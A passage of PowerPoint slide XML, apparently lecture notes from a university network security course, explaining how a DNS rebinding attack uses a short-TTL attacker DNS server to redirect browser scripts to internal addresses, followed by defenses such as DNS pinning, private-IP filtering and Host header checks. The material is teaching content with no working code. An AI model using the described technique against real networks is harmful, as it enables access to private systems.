              <a:rPr lang="en-US" sz="1600" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> server he controls. The server is configured to respond with a very short </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId13" tooltip="Time to live"/>
              </a:rPr>
              <a:t>time to live</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> (TTL) record, preventing the response from being cached. When the victim browses to the malicious domain, the attacker's DNS server first responds with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId10" tooltip="IP address"/>
              </a:rPr>
              <a:t>IP address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> of a server hosting the malicious client-side code. For instance, he could point the victim's browser to a website that contains malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId14" tooltip="JavaScript"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId15" tooltip="Adobe Flash"/>
              </a:rPr>
              <a:t>Flash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The malicious client-side code makes additional accesses to the original domain name (such as attacker.com). These are permitted by the same-origin policy. However, when the victim's browser runs the script it makes a new DNS request for the domain, and the attacker replies with a new IP address. For instance, he could reply with an internal IP address or the IP address of a target somewhere else on the Internet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600"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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1961719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following techniques attempt to prevent DNS rebinding attacks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Web browsers can implement DNS pinning: the IP address is locked to the value received in the first DNS response. This technique may block some legitimate uses of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3" tooltip="Dynamic DNS"/>
              </a:rPr>
              <a:t>Dynamic DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, and may not work against all attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Private IP addresses can be filtered out of DNS responses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>External public DNS servers with this filtering e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId4" tooltip="OpenDNS"/>
              </a:rPr>
              <a:t>OpenDNS</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5"/>
              </a:rPr>
              <a:t>[1]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sysadmins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> can configure the organization's local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId6" tooltip="Nameserver"/>
              </a:rPr>
              <a:t>nameservers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> to block the resolution of external names into internal IP addresses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DNS filtering in a firewall or daemon e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>dnswall</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5"/>
              </a:rPr>
              <a:t>[2]</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Web servers can reject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId7" tooltip="HTTP"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> requests with an unrecognized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId8" tooltip="List of HTTP headers"/>
              </a:rPr>
              <a:t>Host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> header.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId9" tooltip="Firefox"/>
              </a:rPr>
              <a:t>Firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId10" tooltip="NoScript"/>
              </a:rPr>
              <a:t>NoScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> extension provides partial protection (for private networks) using its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId11" tooltip="Noscript"/>
              </a:rPr>
              <a:t>ABE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> feature, which blocks web traffic from external addresses to local addresses.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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33414898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Very different kind of security problem. Confidentiality, Authentication don’t works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FD506D70-4FDC-464B-81DF-79C5C4B28E23}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13649852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Because</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> all the resource in the network are consumed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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27265800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82AF-F2E7-0454-696F-8714CBB2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8E3C158-D139-4790-6D83-8657D0922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9562AB9-5332-6E21-84EF-4C310F2E57B9}"/>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0AC7BCBF-DD21-1CED-E9EA-D6308BAE557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D93E02D-3731-7574-CDC8-F79A6BBF59A9}"/>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299280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C5B-27DF-62E5-5ABC-72FAA61FA03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1141FFA-47B8-708D-013E-E07589E64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D75BFF1-AAD4-B3BC-2B50-C2DFE7CE64E5}"/>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A711C761-8160-3F64-5D1B-7960F9486CC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45664D1-21CA-32CD-4C6E-E744670663AC}"/>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269124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7E68C-8FF2-0394-81F7-6F7F3C2E4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FA572C9-A2EC-44DB-007F-C82E8BC51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B31D431-4059-4D20-B6B0-769C560FC1E2}"/>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6FC79C6A-7F8C-6118-0756-69A2E9E1ABB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1A9C531-77F6-FE19-6A72-C4358D3EDE81}"/>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906798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011D-2A6F-EC96-C5A4-0CABEE4602F5}"/>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PK"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67163247-020F-A43E-F991-8C91EB8B5E0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D7F861B-585A-24B8-B915-85AD6E515DF7}"/>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E2817BAA-6409-2535-2811-C2BD99D2637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CD377AF-0300-2029-EB68-D21F89F246C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16052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30CB-4800-1F4C-4049-610B95C9E6B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D45358B-9AFD-3172-5639-501841EA0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ADCD974-2A2C-B25D-1993-249462DC548E}"/>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486F37A8-B933-E56F-24AC-E337758C81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CE6BED-B76F-09E0-2C9E-4B5BE412AA05}"/>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907731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7E7-AE58-F1FB-5CFD-F4B2B73B6475}"/>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9DEF83-6549-AA72-0CEF-F16631D61CC8}"/>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47865-EDF4-2501-CAAB-98B97C94207B}"/>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950223A6-EAE2-9D61-01BD-D0382F4E57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E80D88-A590-67DB-919B-D57E16053DE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2793054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3FA2-9402-24D8-36F6-43DB9FBA32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9B448F3-3B8A-F995-584C-EB72CB07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5E18C7D-4A65-2F78-5162-677E70BC9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0290603-8BD0-B0F3-09BB-4F3DBB24C65F}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC59A49A-5ED9-EF50-023C-DF291E2282F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427EBF-897C-6479-6B8F-9B99B83BC130}"/>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44311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5346-BFCB-DE38-18BF-335A6FB86B44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839788" y="365127"/>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9141657-FB06-BE19-4F31-D6121608EB16}"/>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5122-8C70-79E2-2867-E14A5B7FDB29}"/>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E30B1D9-55B0-5EA4-11FC-1F94A77000D2}"/>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F08C5-1BC1-9A14-AF7A-8E88BA9E50F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84ACAFC-5C8F-EFE1-4C5D-C1AA227C0B8C}"/>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8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAF146D6-D9C4-EC79-F366-CECDB3E1B89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E78C664-5F27-6E9B-CDCC-717B28AA23FD}"/>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67800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CE59-92DD-34EE-E345-02E16428F92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E2C0FAB-3266-CFCC-6287-3856F4A5AFC3}"/>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4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7E24438-5106-33B1-B66B-D4BC3ED31EC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EEC2B82-343E-938F-E23D-757F03ACD19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2651306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3D632-059A-2DD5-9C08-9CE835025D24}"/>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3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B564D958-C9BF-505C-1631-D911FB76EC8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74939E3-6FB7-66C6-FF32-0B73A1A5B50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985874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8C42-0BCA-8C01-7A33-22CE92B7E8B4}"/>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68CF8CB-7C86-5DFE-D219-AE857C2BDB53}"/>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5351389-8FB2-C2A3-6910-920D3E1C1DD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BDB6C4-DE0B-8539-9D41-361E60889FCF}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{148D7545-41F7-974F-4FF8-CC2EB7F780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AE0183-CBD2-D4C4-CEFE-EFD1A453ADA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02500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CFA2-FF32-A236-52C4-7BE7375D386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085A0CF-B04E-6F6E-A728-D40F6C6B7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11039C1-9C01-DAA3-9A85-B1618DDCF4CF}"/>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C2A0943C-6493-389C-7D2B-1F858166432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6743D25-4FDD-BE4F-37B4-CD3CB7AC974F}"/>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884881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9C19-23FA-2BA2-48FA-52307165A1A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B346578-7EA5-8B56-0887-D3277C4BFCF2}"/>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K"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{342E3974-2283-D615-7283-E8A22A31B45F}"/>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099B63B-98B9-E84D-2DC4-628060B9A61D}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EFEC970-6576-4F95-77FD-DDEB3483740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E0965E0-27B8-9CED-1BBA-98B22ABD00C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981152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F984-A480-5D94-387E-9E571314D11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F63AF08-E451-C6DC-2EC8-B46714554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8F3A5D-C0C8-8EBF-9A8E-88A4209DC82D}"/>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860A2C36-83EB-73E7-16D1-265E4D4397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96CE2B1-8531-5E6E-5D1B-16B127F551F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782998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03CBA-3774-4846-7E6E-A7D8969EEB5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7C736C9-A4F0-D419-9159-ACC663F2807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76AB8C-6986-4312-29D3-6F822441EDB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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1809EF98-2FFF-1BD6-F276-FD69B1129F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38BF200-1BC9-D4FA-EA4A-648EA8A5325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675187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34790E2-91AD-466C-A17D-A72DE2A25B61}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/27/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Footer Placeholder 16"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>FAST-NUCES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80468648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F81DC8-1BE9-4183-95EB-119C33F6F0A8}"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5023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911F8BB-D04E-4425-842E-CAC6D960B23C}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/27/2024</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FAST-NUCES</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507109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6F53894-EADC-4559-9073-81974C917A50}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/27/2024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08379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C806CA3-94FD-4F02-AE08-1332C5759B43}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/27/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>FAST-NUCES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60964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6D80167-333D-40F0-91B7-7FB3FCD390C2}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/27/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>FAST-NUCES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353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2BF7E-AF69-4AD5-82BB-34182997F8CF}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/27/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>FAST-NUCES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994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5D4-6C38-8A76-6833-F27126874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CA68CD8-1C61-1F06-CBCB-B696876B9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02058-DC98-F9B1-3427-5AE2E5C0EDB1}"/>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A29192D2-D349-1AF3-BD5B-6B942EF794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7001592-9BFC-FBA3-2A16-DC05C68E7197}"/>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26842551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DB90C9-7E0A-498A-A5BF-3F002CD76DAD}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/27/2024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65747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CD72755-4AE8-48B3-B84C-C3AF91A7848D}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/27/2024</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FAST-NUCES</a:t>
            </a:r>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3266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9148CC-325B-4806-A706-F045E5F64927}"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9820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631835-0736-43C8-BA6B-46F5104ACC5D}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/27/2024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328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84E2-78F5-4E5F-A98C-41480AAB29D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3C284EA-E3CE-450F-1867-44FD6D254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8F61681-27E7-1476-4D17-2DE9B9C6E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2A256C2-A990-E29F-B1A7-FB5D6C3092A2}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B5B90E8-285D-E71D-CAA5-94B1F96DE71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79FF3EA-B0F7-0C95-34ED-31750B682710}"/>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1776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6598-12C3-5D6B-59A4-DA876408D22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553D3DE-AE94-D483-87D7-751B47EAA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CFE49-D776-9E39-10D7-328121681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782DAB7-4991-74AD-F736-BEC2C5294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C1B65-AA46-3538-675A-3241AD9BF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5B6F7FB-FD8E-328D-E320-0A17ECF7EC81}"/>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8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91690B89-7837-6132-081D-D35DDD62BFD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C41BDCC-6081-C708-9F0F-8003572D764D}"/>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53608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A04A-21AC-4AC1-2B09-EEE78B0EC2D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C6719F5-7687-0400-DC5B-C4502841B469}"/>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4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
